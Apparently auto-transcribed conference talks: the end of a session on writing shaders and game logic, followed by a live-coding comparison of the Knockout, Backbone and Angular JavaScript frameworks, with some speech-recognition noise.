need to add these two together. And then I take this one and I say add like that. I can combine these two using this like that and then put the result in there. So what we have here is the diffuse plus the specular highlight on the teapot. So if I go into the constants here in the shader I should have something called the specular here. Let's see... so let's put this into one. Okay, just enhance the effect a little bit. I can actually see that I have the specular highlight. So those white parts on that teapot is that formula I wrote the shader on. That's the light coming down on the surface and reflecting directly around the eye. That thing that hits you directly in the eye should just be the color of the specular and then gradually fading to the color of the surface based on the angle from the eye. So if you hit something around here it still gets a little bit of the effect on the surface. Just to take it a step further you could do... try to create a glass object. So this is a shader I wrote a few years ago. I'm just going to show you some images of it. What it does is to have an object there and once the ray of light hits the object it goes through the object for a certain number of distance. So I actually calculate the length the light travels inside that object and based on the length it should be more and more colorized by the object. So this should look a bit like glass and the thicker the glass is the more of the glass affects the ray gets while traveling through it. So Bier Lambert wrote a simple equation for this which actually colorizes the T is the transmittance effect on the color and it calculates based on the distance the constant C and the constant C is just a constant you can give to a particular glass object because some objects colorize the ray more than other ones and the longer it's in there the higher the transmission will be and A is calculated by the logarithm of T and the distance. Then I could add reflection to this as well so I had the transmittance effect and then I have the reflection that we did the specular highlight that I just showed you I add that and then I can add refraction so instead of just traveling through the object the light can bend based on the angle it goes into the object with so I can just use the index table from the physics class and calculate it based on Snell's law and result is pretty good as you can see it does look a little bit like glass it's simple it's a quick a quick shader you can do this on objects in your game and make it look really really nice that's the power of shaders you can combine shaders and create really really amazing effects and they're simple to write just to show you a quick video of this effect running like this you can see here that it refracts based on the light and the background so I'll go the algorithms are perfect it does exactly what you want it to do you write a code and it does that but imperfection creates perfection what does this really mean let me show you an example you see this mud graphics this is a procedurally generated image based based on Perlin noise that generates ground or some kind of texture I think you use on the ground when you walk at some kind of landscape so what happens if you take this algorithm to scale this up a little bit you get something like this you can see it's the same algorithm just repeating all over to create a pattern and you can really see the pattern because this function is perfect what you really want to do is to create something like this instead of just repeating you actually try to create a function so it gives you more randomness and irregular patterns this could be the wood bark of a wood or a tree or something you really really want to make that look perfect imperfect rather than just following the algorithm because it will make trees look the same all over and you could really see the pattern repeating all over you want to really avoid that just just to keep that in mind when you produce shaders and you start producing games so I still have a minute left I'm just gonna quickly talk to you about the Lumilite game and there's a lot of logic going in when you create a game you really have to really think about okay well how is the game working on this example I have flies traveling all around and how do they travel around you have to think about that so when you create a new game put a piece of paper and draw the game and think about what is the movement what is the player movement how does the enemy move how is the input how is the design so this is the sign of my game and this is the movement of the fly so I brought a simple AI for this one just checking states and I changed the state on every random interval so every time this is updated I give it a new time maybe three second you should continue that direction three seconds and then we evaluate if it should change direction or not may get it look very random it's not very easy to actually hit it but I know as a gamer you actually have to place and I drew the game I drew every level of the game and I made this paper cuts of the dinosaurs here to so I can place them around and the level and create cool stuff so that's my talk around unfortunately I wasn't able to show you bandinals because it didn't load for some strange reason but come to my stand I'm happy to show you how bandinals were created the level editors and how it everything was made you can find all the materials of this presentation at digital arrow that word present calm which is my blog you can find a lot of tutorials there as well as Commodore 64 programming tutorials if you're interested I'll teach you how to create Commodore 64 games in assembly on a Windows machine just go in there and check out tutorials come to me and talk with me I'm happy to help you out I really really do like game developers and graphics and talk about it so I'm happy to help you out wherever you need I'm on Twitter if you've got questions I'm prioritizing graphics programmers so thank you very much
|
Want to learn how to create games for Windows 8? This session will give you the information you need to get started with game developmet. We will take a look at the different technologies available for creating games, learn how to use MonoGame/XNA and how to write some simple shaders for advanced 3d effects.
|
10.5446/51495 (DOI)
|
Ychwanbarful... Daroddod arweithio? Roedd. Rwm lle yn llwyddo defnyddios y ddweud o'r ddu identifiesi haith ynw dod i ni'n trwy'n gam- Ricoib dy'r sydd ymerthau ychwanburth yna i'n yn gallu cael eoldo'i Yuw. Fi'r own iawn eith holl! Mae'n ymd 왜냐하면 yn sits Er i teulle hwn i hyff iddon gweithio, Ro Giovanni, byddwn captain FGPUB. I'm going to be talking about the JavaScript inferno. This is going to involve a lot of code, but not straight away. So there's a little bit of stuff I've got to go through. I'm going to go through some slides here. I'm going to be live coding, and I just want to tell you that straight up front. It's not going to be too deeply technical. It's more process-oriented, so I kind of want to get that out of the way straight up front. If you guys have a deep technical talk, you want to go crack some code, then by all means, I won't be offended. Maybe a little bit. But let's get to it. Okay, so this is, as I mentioned, a bit of a story about my adventures with JavaScript. That's pretty much it. So about three years ago, I started dabbling with JavaScript again, and I kind of went through all kinds of permutations, hating it, loving it, hating it, loving it, hating it, loving it. And I ended up just this last week deploying an app that was heavy, heavy JavaScript, talking to an API in the back. It's our techpub app. It's live. We still have some problems. But I found it absolutely fascinating the things that I was able to do, and I thought it would make an interesting talk. And by the way, one last thing I wanted to mention. You guys have kids. I'm sure some of you must have kids. Last year I tried a little experiment where I gave my kids my old iPad, and it had this app called Paper on it, and I said, I need some slides done for me. And so they cracked together some pictures of elephants and dolphins doing all kinds of things because I was talking about Postgres in my SQL. And it was great. So this year I decided up it a bit, and I said, help me write this story. And they said, OK, we'll help you. And so my two daughters, Maddie and Ruby, help me with these slides. So all the slides you're about to see are their drawings. And they actually help me write the story. So if you see princesses and fairies and bunnies, it's all they're doing. So as I mentioned, there are 15 slides. This is slide number three. I'm going to dive into code in just a minute. I just want to see this straight up front. I'm going to slide right through these things. So I'm going to talk today about things that I've learned, as I mentioned, the hard way, good way, bad way, every which way. I'm going to talk about frameworks that I've used. And I'm going to also sprinkle it with some opinion. And it's not going to be heavy opinion. Like, oh, I hate this. This is good. This is bad. It's just from my experience. So I don't want you guys to think I'm telling you what I think is right or wrong. It's just what I've experienced. This is also about failing and failing hard. And the funny thing about JavaScript is if you like to fail, then JavaScript is your language. Seriously, though, we learn by failure. And if you talk to a hardcore JavaScript dev that's been doing it for five, 10 years, whatever, and they'll give you this look, like, what's wrong with JavaScript? And then if you talk to somebody who's been doing it for, say, two to three years and just has come out of the pain point areas like me, they'll say it's actually a lot of fun. And so that's kind of the way I want you to think of this talk. This is what talk I'm going to give. You and I are having a beer or coffee or a tea, and you say to me, I hear you even doing JavaScript, and I say, yeah. And you say, why do you like it? So this is that talk. We have an hour to have a little discussion about why I like it. I think I like it because I fail so much. And it's really weird. I fail at it all the time. And in this talk, I'm going to fail. I have studied. I have demos that work, but I have no doubt that I will freeze up and fail. And I think that's good because I'm going to walk through how I'm going to dig myself out of a hole. And I think that's really important when talking about JavaScript. I also think since you fail so much and you succeed maybe 10% of the time, it kind of makes you feel like Superman when you can succeed maybe 11% of the time. The other thing is if you stick with JavaScript, it's going to change the way you think about things. So for instance, I wasn't an evented programmer guy. I didn't work with events, although you can in many languages like C-Sharp. You can use callbacks and closures and all those things. Now having been through the fire, I have kind of learned that there are different ways of solving things. And it's really fascinating. It changes the way you think. So the point being, be positive as you learn this stuff and fail a lot. So the first framework, there goes my voice. The first framework that I'm going to talk about is knockout. When I started working with knockout two years ago, I hated it. I thought it was the most ridiculous thing I'd ever seen. Is anybody here, everybody here familiar with knockout and what it is? I figured, yeah, good. Knockout is just a really quick and dirty MVDM framework from my friend Steve Sanderson. I didn't like it very much. Every code sample I saw made me want to throw up. And I finally met with the guy, and he's the best guy in the world, and he showed me a few things, and I said, wow, that's great. So my daughter asked me, well, what kind of thing, what did it make you feel like? I'm like, it's too much magic. And so I have an oversized stinky bunny. So I don't know. I'm going to give that to Steve. So the next one I'm going to talk about is backbone. Backbone is the next framework I dabbled with after playing with knockout, because at the time, those were the two you had to choose between. See this right here? That's backbone right here. This is... I don't know why I had such a hard time with backbone. I really don't. Looking back on it now, what was wrong with you? It was confoundingly difficult. And so how I learned backbone is actually going on long walks at night with my dog, Reefy, that's my dog, Reefy, right there. And I would talk to him. I'm not kidding you. Late at night, my kids are in bed. I'd walk up the street and go, okay, routers. Okay, wait, routers and events. I'm... And so, yeah, finally got it. And you know how the process of explaining something to somebody, you kind of get it. So yeah, Reefs now a backbone programmer. And then the third one, of course, is Angular. Angular, it's an Angular party. I don't know what's going on there, but I've been using Angular a lot recently and getting really into it. So those are the three I'm going to talk about. So what I'm going to do, I'm going to do some simple tasks. I'm going to do them all in series, backbone, knockout, Angular. And then I'm going to compare and contrast the code. And then what are we going to talk about? What do we think of that? That's me right there about to go on a journey. So the tasks I want to do, number one, I just want to show some simple data on a page. This isn't heavy stuff. I just want to show some stuff on a page, right? That task two is output a list of data. Number three is I want to toggle a class on and off, change colors, red, green, whatever. Just do some simple work. And then number four, excuse me, I'm counting a JavaScript again. I want to save some data. See what it's done to me. So as I mentioned, this is not heavy stuff. But again, I want to drive this home. The point is that these frameworks, if we solve a problem in a particular way, I want to appeal the covers back. I could show you all kinds of fun stuff to dive deep and like, this is what you do and there's a Grand Canyon. And then we'd have a good time and you'd learn something. But this is not a tutorial. This is more a process of philosophy. Because I want to get it. Don't ask me what the ham thing is. I have no idea. I told I wanted to catch the flavor of each one. That's what it was. So that's what this is. It's getting into the philosophy of each framework and what it means to work in them. So the next question is probably on a couple of your minds. Okay, we got Angular, Knockout, and Backbone. What about Ember? What about Sproutcore, JavaScript, MVC, Batman? There's so many out there. The simple answer is, I'm going with what I know. And by what I know, I mean these are frameworks I have deployed into production live. And so those are the only things I can really speak about. So that's answering that. And as I mentioned, it's all code and we are on slide 15 and I am going to start. By the way, I want this to be sort of a casual thing, so if you have a question, shout it out. And if you see me screwing up, shout that out too. All right, so let's get started here. So I am using Twitter Bootstrap and that is the site. It's a blank slate. Here's the code. Let me collapse this down so we can all see it. There we go. All right, turn back on. OK, so the first thing we're going to do is just something simple with knockout. And so as you can see down here, I have all of the scripts added into the page. And so what does it mean to work with knockout? Well, the interesting thing about knockout is it just works kind of right in the page with you. So the first thing I want to do is I'm just going to add an input here and it's going to be text. And to work with knockout, you have to do this thing called data bind equals and you have to tell it what you're going to data bind against. So the data dash tags in HTML5 are perfectly valid, but what I'm about to write isn't. And this is an expression in knockout and this is the thing that freaks a lot of people out, but if it works, it works. So I'll put this here. And let's see. All right. So to work with knockout, all you got to do is, as I mentioned, you got to have it on your page. I have the minified knockout. And the first thing that you're going to do is you're going to create a model. And let's see. And I'll tell you what I'm doing here in just one second. You ever try and type in front of a bunch of people? Say that again? Did I spell it wrong? Thank you very much. Yay! I love you. Are you participating? I love it. Let's see. This is a description. I actually have, just so you know, it's not going to be this painful the whole time. I have shortcuts here, but I want to type it all out first, just so you guys can see it. Okay. So return self. There we go. Okay. That is a model, a view model, if you will, in knockout. That's it. It's a straight up function. And what I'm doing with this is I'm just passing in a JSON dump of data. And it's going to go straight in there. It's going to do some fun stuff. What's it going to do? Well, let's make it talk to our API. So here I'm going to use jQuery. And this is one of the fun things about knockout is it works directly with jQuery, like just right hand in hand, which I really love. And so I'm going to do a gets, and I'm going to call back to the API and the function. All right. Here comes the magic. I said, here comes the magic. All right. So really quickly. This is Node.js that I'm running here. And I'm doing it only for simplicity. I'm running Node.js and behind Node, I have an API sitting here, and I have a store. I just want to show you that really quickly. I'm not doing anything magical. And if I go here to API, you can see there is a bunch of JSON. And it's orders, and it's just an API. It's in all descriptions. So I just kind of want you to see that really quickly. So let's go here and see if I manage to do things right. Yes. Okay. I'm going to do it. Whoops. And his body is not defined. I have an error right down here. Let's see. So if Knockout gets an error, I told you it was going to fail. I didn't think it was going to be on the first demo. If it can't find what you're trying to do, it'll tell you. I can't find body. And so let's go and take a look at that. And I'm going to explain this in detail. There we go. Description. What's that? Thank you. That would help, wouldn't it? All right. Good. Thank you very much. Rob, what are you doing? Result. Thank you. There we go. Okay. This is working, and this is what Knockout's specialising in. You can change this. And when I click away, it updates the page. We've all seen this demo. Let's take a look at this code in a little bit more detail. It sounds like you guys are familiar with Knockout. It sounds like this isn't sensationally difficult. I just want to explain a little bit that the thing that is nice to me about Knockout is that it doesn't stray too far from JavaScript. If you understand JavaScript, then you can work with Knockout. And if you guys notice when I screwed up there, it actually worked if you just sent blank JSON into Knockout. It bound just fine, except for a few things. Down here, you can just see this is a straight up call. Didn't do anything exciting. Knockout's doing a bunch of fun stuff for me. So what I'm going to do is I'm going to just take the scripts, and I'm going to pop it into the save bin right here. And now let's do the same thing with Backbone. Are you guys familiar with Backbone? Okay. This is going to be a little bit more fun. All right. So with Backbone, what I'm going to do straight away is I am going to have to create a few things on the page here. So let's get rid of our Knockout stuff. So the first thing I'm going to do is I need to give it a place to output. And so to do that, I'm going to, let's see, call this the view. Oh, actually I'm going to use this. I've got that already. Okay. So the first thing I need to do with Backbone is create. Let's put up a template. Boy, come on, fat fingers. Geez. Last year I did a talk, but I didn't talk. And I just sat there in code and I thought that was hard. Okay. So this is going to be straight up the template, and we're going to use the Backbone. So does this look familiar to you guys? Do you guys know what script templing is and what works? Okay. Well, I'm going to explain it more in just a second. So this is going to be parsed by Backbone and filled with data as soon as we pull it from the server. And so what I'm going to do is just output this. This should look familiar to you if you've ever done ASP.net. And P goes description. All right. That's simple enough. Let's go now and pull some data. Okay. So the first thing I need to do in Backbone is I need to create a model. And so it's backbone.model.extend. And that is that. Oh, right. She's getting out of my way. All right. So what I'm doing right now is known as boilerplate. What it means is you've got to go through these. You've got to make these functions in Backbone and you have to go through and you have to absolutely touch every single part of your application, every single part of what you're trying to do. And it's long and monotonous. And so this is one thing that made it difficult for me to use Backbone is when you're writing this stuff out, you have to remember every single incantation. And the worst possible thing is when you screw up, nothing shows up. No errors, nothing. So you have to work your way backwards. And so what I'm doing here is I'm telling this view because views are reactive in Backbone and they're invented. So I'm binding an event to this view and I'm saying whenever the model is behind this view changes, I want you to do a thing. And that thing is going to be to render yourself. And then I have to tell it that, remind it where the scoping is. I'll talk about that in a second. It's just a crazy pain. Okay. So now that I'm telling it, it needs to render itself whenever the model changes, I now need to tell it what the render function is. So this is another thing in Backbone that is just a crazy incantation. You're going to go over and over and over with again. So the first thing you've got to do is you've got to find where your template is that you're going to be rendering your model into. And so I declared that here in the script tag. So I'm going to use some jQuery here and I'm going to find that script tag and I've got to give it an ID. So we'll call it model template for now. And then model template.html. And now that I've got that, I've got to call the compiler. Compiled and then it's going to be using the underscore templating engine. Underscore is a helper library that comes along with Backbone. Oh boy. Template. And then I'm going to pass in the source of the template, which I just pulled out of the DOM using jQuery. And then I'm going to pass in this model and to JSON. Right. And now that I've done that, this is where the fun starts. Okay. What am I doing here? This standard render function inside of Backbone, something you'll have to remember every time you use it. The way to get around this is to abstract Backbone into a higher level, which is something my friend Derek Bailey did, something I recommend you do, using a project like Marionette or some other. So inside here, you go through the same three steps every time for every view. Number one, you have to create your template. Number two, you got to create your view object. In initialize, you got to bind that stuff together. You got to bind a model to the view. And then when that fires off, you got to say, okay, pull the source out, use jQuery to do it. Now compile it using the template compiler and then boom, stick it in the DOM. All right. Yes, I got to create my model. So I need to do all that right now. All right. So what I'm going to do here is create my model and model equals new model and bar view. And I got to instantiate this new my view. And I'm going to tell the view when it spins up L. I'm going to tell you what L is in just a minute. You're going to be planted in the view. And your model is going to be the model who wants to take bets on whether it's going to work for a shot. And all right. So here I'm going to instantiate the model right. And I'm telling you that the element, every view is bound to an element. And this is a tricky part of back one. Every view is bound to an element and it's represented by EL. And inside of here, you can also work with a j-querified element, dollar sign EL. And I'm just telling it, take that, bind it to your element, bind the compiled stuff to the element and show it on the page. So that element is right here, the view. So ideally, if everything works, it's going to stick itself in there. Well, how am I going to kick this all off? I just have to say model.fetch. So when I call fetch, what it's going to do is it's going to say, oh, well, I'll go fetch some data from my API. And it's going to go out, hit that, pull the JSON back, and it's going to refresh itself and fire the change event. When the change event happens, the next domino ticks and it's going to call the render function and off we go. All right. So that's it. Remember I told you failing is fun and when you succeed, it's really good time. So that's it. That's it with backbone. So let's take this code and we'll put it over here into our safe bin. OK. And I'm going to get rid of this. Now let's do this with Angular. Has anybody used Angular here? We're seeing demos. This isn't quite fair. Backbone's been around for years. Angular's been around for a while too, but it's got a lot of niceties and it's got the power of Google behind it. So the API is just a little bit cleaner and easier to use. So let's take a look at that. The first thing I need to do here is I need to tell Angular that we have an application. So I do that. I've already done it. I just drop in the attribute ng-app. And that's a magical thing with Angular. And what Angular's going to say is, oh, goodie. Anything inside this now I own. And what Angular literally does is it elevates your DOM to have new abilities. And it's kind of magical too, I suppose. So now that we have ng-app declared, I need to create a controller. And I'm going to create a controller and I'll just call it my controller. And this is the part I love about Angular. A controller is just a function. Just give it the same name. And that's a controller. There's no inheritance here. And that's an interesting thing to me. When I first started playing with Angular, I thought, well, that's fascinating. There's a lot of things you can do, you're going to have better accessibility and so on with this kind of thing. So let's go and grab some data. And now we come up against the next thing with Angular. If you want to work with the framework, you inject what you need into the functions that you're using so that the framework itself has a bunch of little tools that are kind of floating around out in memory. And you can use them whenever you want. And to use them, all you have to do is ask for them. So the first thing I'm going to do is ask for a thing called scope. And I'll talk about scope in just a second. The second thing I'm going to do is ask for a thing called HTTP. HTTP is a bunch of light wrapper on jQuery. JQuery is bundled with Angular. So in here, I'm just going to say, HTTP.get API. And then when it's done, what comes back is what's called a promise. It's a function of fires whenever you're finished. So you have to pass a callback in here. And I'm going to say result. And so how I'm going to get data down to the view, which I haven't even done yet. I don't even have any template. To get data down there, you use scope. And what scope is, is this fun little object that is basically empty. And you can attach functions to it. You can attach data to it. You can do whatever. And it's exposed implicitly to your view. So let's take a look at that. So I can say scope.title equals result.title. And then scope.description equals result.description. And yeah, that's it. OK. And let's see. And so now to work with this, I've wrapped this section here saying that this div tag in my DOM is controlled by my controller. So now I'm free to do all kinds of stuff. So I can come in here and work directly inside the DOM with these funky tags. And I can say title. And then here I can say description. And that's that. All right, what do you think? Wait, did I spell that right? No spelling errors? Oh boy. Boom! That's good. Dot was not a lot of code, was it? To do the same thing that Backbone did in a whole bunch of code. So let's compare and contrast these things really quickly. Put this here. That's great. So the first one up top here is knockout. There's a little more machinery that goes on with knockout. And it's kind of just brute force. And you want some data, then you've got to use jQuery. Go to the server, grab it, and do it. To me, I like this. I like it a lot because there's not a lot of noise between me and the data and my DOM. I just have to focus on making these things observables if I need them to be observable. And then I've got to focus on doing the right data bind in the DOM itself. So the data bind that you can do, number about 20 or so. And once you memorize those, you're on your way. So the API is very slight and it's very usable. The way you get yourself in trouble with knockout is if you try to start doing complex things, you're tempted into trickery. That's something that I've noticed at least. With backbone, grant it, is a little bit older. And so a lot of what you see here hasn't changed much because a lot of people are using it. And the strange thing about backbone is in terms of popularity, it dominates. It just dominates. And for me, learning backbone was a massive mind challenge. But once I got the incantations down and I failed about a zillion times, I started to understand how it all went together. This is where I started to get a flavor of evented programming. And this is actually where I still kind of like backbone. So look at this right here. The way that this view is rendered, as I mentioned before, is it reacts to a change on the model. And that's the way classic MVC has always kind of worked. Whenever the model data changes, the view refreshes itself. This scales out really well, especially if you have a page with a lot of views on it. And one model changes, it ripples out across the pages, and that's pretty fascinating. This stuff right here is really just a pain. But the nice thing about it is if you don't want to use their built-in templating engine and you want to use handlebars or some other templating engine, you can. And finally, there's Angular, which is bleedingly simple. But if alarm bells are going off in your head right now thinking, well, that makes a neat demo, but how does it work out in the real world, we're going to talk about that later on. Anybody have any questions so far about what you've seen? Shout them out if you do. This is a wide-open session. How do those skill-friendly students be parameterized? Say that again. Those says skill-friendly students be parameterized. How does Angular know what you're asking for? Good question. So the question is, how does Angular know what you're asking for when you, is that right? How does it know what to do and how does it know what you're asking for? The trickery comes because Angular owns your DOM. The minute you say this is an app or this is a controller, Angular takes over and now you're working with an Angularized DOM, if that makes sense. So when you ask for certain things in a function call, so I mentioned that this is my controller, well, it knows it's my controller right here. So it's going to instantiate that for me. Once it instantiates, it's going to look at the arguments list and it's going to match it up with providers that it has in memory. So here's something fun about Angular is, I was going to leave this to the end, but I'll just say it now. It's all fun until you try and minify your JavaScript code. When minification will go in and change all your variables to A's and Z's and B's, well, you can't do that with Angular. These have to have exact names. And that's a lot of fun when you minify your JavaScript code and nothing works because A provider is not present. Oh, good. Thank you for that. So that's actually, that's a bit of a steep learning curve. Did I answer your question? Yeah. Absolutely. Yeah, it's magical. Say again? No, it's not. The question is, is my controller a global? Yeah. No, it's not global to the window in the JavaScript memory space, so it's still confined to itself. One thing I haven't showed you yet, which is what I'm about to, is that all of this gets wrapped into a module. And so that contains it if that makes sense. Anybody else have a question? Okay. All right. Let's move on here. 28 minutes left. All right. Let's really quickly, let's see. I wonder if I can skip ahead here. I'm going to go out of order. Yeah. Let's take a look at saving data, because that's one that I really want to get to. And so let's take this out here. And goodie. All right. So the first thing I'm going to do is I want to work with knockout. And knockout's great if you want to have two-way binding, as you guys saw. I updated a text box and the thing over here updated so it's DOM aware, so that's fun. But how do you actually work with data? Like if you change something here in a text box, how do you save it back to the server? Well, knockout just works with jQuery and off you go. So if you know jQuery, then you're good to go. So let's take a look at this. So I'm going to create a monkey model. And let's see. I'm going to do the same thing I did before. I'm going to pass in initialization values. And let's see. Are you guys familiar with this aline cantation? Var self equals this, or var that equals this? This is, I'll just say this really quickly. If you're not a daily JavaScript developer, this might look weird. JavaScript is a highly functional language, which means you can take a function, attach it to a variable, and pass that variable around. So when a function is executed, it's executed in a context. So it'll bind itself to whatever's calling it, and basically take its scope from that, if that makes sense. If you pass it around as a variable and you end up calling it arbitrarily somewhere, it'll bind itself to the global namespace unless you specify otherwise inside of the function itself. And if that confuses you, welcome to JavaScript. So what I'm doing here is I'm setting the scope. Setting the scope right up top to a variable. So if anything changes it within the body of the function, I still have reference to this in, wow, what a nightmare. So we're going to return this. Sorry, return self. So here I'm going to say self.title, excuse me, self.name. And I'm going to be using this thing, which I didn't really explain very much before. This is knockout observable, and the interesting thing about this is this is just telling knockout to watch this value, and that's that. And so it tracks the variable, it tracks the value that you pass in whenever it changes. It ripples the stuff to anything that's listening to it. So I'm going to instantiate this with vowels. Let's see, where am I? Yep, vowels.name. Self.setname, and it's going to be a function. Right. I'll explain all this in just a second. Okay, so in my code in the back here, I'll just show this to you really quickly, I have a path here where if I pass something in, this is again a node, if I pass in something to monkey, it'll just set a name inside redis, and then it's going to pass back whatever the name was changed. So I just want to show you that there's no magic going on back there. So what are we doing here? Well, what we're doing with knockout is we're basically saying you're going to observe the name, this value that I gave you, we're going to observe this. And if it changes in the DOM, I want you to change it here inside of this variable. And then when I call the setname function on the DOM, which I'm going to do in a second, this is just a straight up function, I'm going to pull that value out of the name variable and you do this by invoking it. And that is weird. But that's just the way knockout works, because you can't arbitrarily assign values in JavaScript, it's dynamic language, it'll get confused. So to get a value out of name, I just say self.name, notice I don't have to use jQuery to go out and interrogate what's in the input box. It'll just work because it's binding back and forth. Next I'm just going to post off to jQuery and I'm going to send the data in and I'm going to get something back. All right, so how is this going to work here? I've got to kick up my, let's see, where is it? There we go. It's height equals text. And I'm going to do the magical databind. Databind is going to be value is name. And then we've got a button. Go. And, okay, good. So this is where it's really fun to start working with knockout. You might be thinking, where's the form? If you're going to do a post, how can we not post anything? And this is where you kind of start to shift your mind away looking at an HTML page and thinking forms and posts and refreshes and you're starting to think this is actually a desktop kind of experience. You're binding controls to stuff on the back end here. If you're a classic, not class, but if you're an ASP.net person and you do web forms, this is starting to become your road behind right here. It accepts its JavaScript on the front page. That really helped me to understand what I'm trying to do here. So now what I need to do is I need to call databind. I'm going to bind the click handler here to set name. And that is that. All right, so let's see if this, oh, let's see. No, I can't do that. I have to go here. Here's a new monkey model and that's right. I got to wrap this stuff here. Use jQuery and the DOM loads up. And I'm going to do a get from my API and function results. There we go. Pass the result in and then ko.applybindings. And check that. Yep. Okay. Hopefully this will work. All right. Didn't work. What? Monkey model. Say it what? Yes. Thank you. Yes. That's the name of my monkey, Boppy. Don't ask. Okay, so that just shows up. And that's good. So let's see if we can change the name to hippity hop. And so we change it. Boom. Wow. Almost, almost for, well, no, never mind. So that just worked. And that's not so bad, but that's basically your experience when you're working with knockout. Kind of manual. You know, the data interaction with knockout, the data story with knockout, they don't have one. As I mentioned, just use jQuery. Now, there's other things I could do here if I wanted to. I could have a full model that has a subscription thing going whenever you change something, it hits the server and all that stuff. As manual as this seems, I find it fascinating just because I can control it completely and there's not that much abstraction to go through. Anybody have any questions on this before I flip it out? Okay. Let's take a look at this with Angular. Not good. I got 20 minutes left. That's awesome. All right. So with Angular, we're going to do the thing that we did before where straight away I'm going to create a model or a controller. And notice this. I'm using WebStorm, by the way. That's what this IDE is. It's from JetBrains and I love it. It's only $49. It's crazy. And you can plug in. So if you start working on your Mac and you want to have a great IDE that shows you all the bindings that you need to work with Angular, this is great. I really enjoy it. So this helped me a lot to learn Angular. So I'm going to set this to my monkey controller. And then down here, let's see. Where am I? Yeah, let's put this up here. So the first thing I want to do is I am going to come in here and I'm going to set this to text. This starts to feel a little bit like Angular, excuse me, like knockout with data bind. Except instead of saying data bind with some arbitrary expression, Angular now owns the DOM. So I can work directly with attributes. So I can say ng model and I can say this is just the name right here. Monkey.name. And then we're going to put in the button again. Button.button.success. And then we'll say save here. And on this, I'm going to do the same kind of thing I did with knockout except this is explicit as an attribute instead of a data bind thing. So I'm just going to say set name. Like that, right? All right. With this example with Angular, I'm going to do the simple thing first and then I'm going to expand it out a little bit so you guys can see how you're actually going to be working with Angular. Actually, I'm going to just do the right thing straight off to answer your question there about is this global and how is this handling what's happening. So normally what you do with Angular is you work with what's called a module. And so I'm just going to call mine app. And then you ask Angular to create a module for you and you give it a name. So I'm going to call mine monkey app. And the next thing you need to do is tell it what dependencies it's going to be using. Here I don't have any dependencies straight off the bat, but I'm going to use one. And you don't have to do this normally. This is where Angular gets confusing. If I was to take this array out, it won't work. It needs to see an empty array for some ridiculous reason. So I'm actually going to be working with another external library. So I want that library available to Angular. And to make it available to Angular, it needs to be injected. Angular is injection based, dependency injection. So the library I'm going to put in here is ngresource. Where's that library coming from? What's coming from this file right here? So that's kind of a nice feature of Angular. It doesn't dump the kitchen sink on you. If you want to work with the ngresource library, just add the script tag and then you'd have to tell Angular you're going to work with it. Step one. So then I am now going to kick up our service. I'm going to have a monkey service. So I am going to say app.service. And I'll just call this monkey service. And this is simply going to be a function. And the function is going to take resource. It's going to be injected with that. And then let's see. All right. This.monkeys equals right. All right. This is where things get fun. So now I got to do my monkey controller. So instead of creating the monkey controller as a straight up function, I'm actually going to pass a function into my module. And I'm going to tell it that its name is monkey controller. Is that confusing, guys? It should. So I'll explain all this in just a little bit. So I have to, right, so I need to create a function here and I have to pass in some dependencies. The first thing, I need to work with a scope because I want to pass data down to my view. The second thing I'm going to do is I'm going to pass in my monkey service that I just created. And so when the thing loads up, I am going to simply say scope.monkey equals monkey service. And I believe it's just get, right? Yes. Right, monkeys.get. And then scope. Since I have a click thing, I got to do a set name function, scope.setname. And that's just going to be a straight up function. And I'm going to save our monkey equals new monkey service.monkeys. And I'm going to say the name. I'll explain all of this in just a second. And the name is on the scope that I can pull off. Scope.monkey.name, correct. Come on. Okay. Just checking myself. Okay. What did we just do here? Well, I'm going to say straight away that it doesn't need to be this much code. If all I was going to do is try and save a monkey's name, that's a weird sentence. If all I was going to do is that, then I wouldn't be writing all this code. But when you start writing bigger apps with Angular, you're going to want to structure things this way. First thing I want you to notice is how much you're working with injection. Notice that right here I called this thing monkey service. That's just a string. But down here, I'm using it as an actual variable. And that is something that is really wild. Because what Angular does is when you declare a service, like I did right here, what it does is it goes in and instantiates this straight away. And it creates it as a singleton. And that's going to be used everywhere around your app. That's a neat thing. And it's also a crazy thing. Because if you do some stuff in the service where you're expecting things to be instantiated and changed, never. It's a singleton and it stays that way the whole time. So by using the resource library, what I'm doing is I'm saying there's something off in the cloud that I want to talk to and get data from and push data back to. And I get all of these fun methods like get. I can just call get on monkeys. And monkeys again right here is a resource. I'll call get. It's going to go out and get a request for me. It's going to return a promise. It's going to attach that promise to the scope. That scope again is just a transport mechanism to shove data down into the view. And it works directly with promises. So I don't have to do any callback craziness, which is a fun thing, is Angular. And then the next thing I do with the scope is I can create a function and just attach it to the scope and now make that available down in my template right here. So I can call set name and it knows what to do. Inside set name, I am just creating a brand new resource. I'm just calling new on monkeys and I'm passing in some initialization data. I want to set the name there and then I'm calling save. That's going to go ahead and post it back to my server and we're good to go and I hit an alert. What do you think? Maybe. Maybe not. Monkey controller is not a function. Got undefined. Oh, right. Ah, because I have two things wrong. One, I have to declare. So what just happened there? So Angular came down and as you notice, it started with the DOM. It took in everything in the DOM and then it's going to go back and hit the JS, which is interesting. So it started with the DOM and said, okay, well you declared a controller. Well I'm going to go and try and find that controller. So I tried to look for a function called monkey controller. I don't have one. What I have right here is a module and I have a function inside of it that has the name monkey controller. So to get around this, all you need to tell it that it's using a specific app, a monkey app. Now it's going to go and try and find this app right here called monkey app and then it's going to go, oh, okay, I'm going to look for the controller in here. Let's see if I'm lying. So that's the way that works. So Hippity Hop is a really silly name. Let's change it to just George and hit save. Yes. Let's see if that works. Yeah, if that works. You hopefully are noticing that there's parallels between what I did with knockout and what I started doing with Angular. But the difference is that with knockout, if I wanted to structure things better because I know my app is going to grow, it's up to me. It's up to me to kind of think it up like what do I want to do? With Angular, notice that I'm doing something completely different. I'm now working with the notion of a module. And inside of a module, I can have services, I can have factories, I can have all these things and I can inject those services into controllers. So I'm starting to see separation patterns that the framework offers. So that's actually a fascinating thing to think about because now you can scale complexity very gracefully. Does anybody have any questions about this? You must. Someone's got to have a question. Yeah. You said something about minifying. Yes. How would you solve that? Good question. I should have probably answered that. So the question is, well, minification is a problem. How do you solve it? And so what you do with minification is anytime you're injecting anything, a fun little process you have to go through, anytime you're injecting anything like you're seeing right here, you have to enclose it with an array and then you start it off by saying resource. Just like that, I think. I might be a touch off on that syntax, but that's basically what you're supposed to do. Actually, is it? Oh, whoopsie, I put the thing down. That's what Skeet would say. Whoopsie. There we go. Yeah. This is weird. But it's something you learn to do and it's probably something I should have done straight away. There's other ways of doing this. You can work with the injector if you want, but this is how you avoid minification hell. And unfortunately, when you're working with Angular, you don't know right off the bat that that's going to happen to you. Any other questions? Yeah. Yes, the question is, can you have more than one module? You can have lots of them. And this is where Angular starts 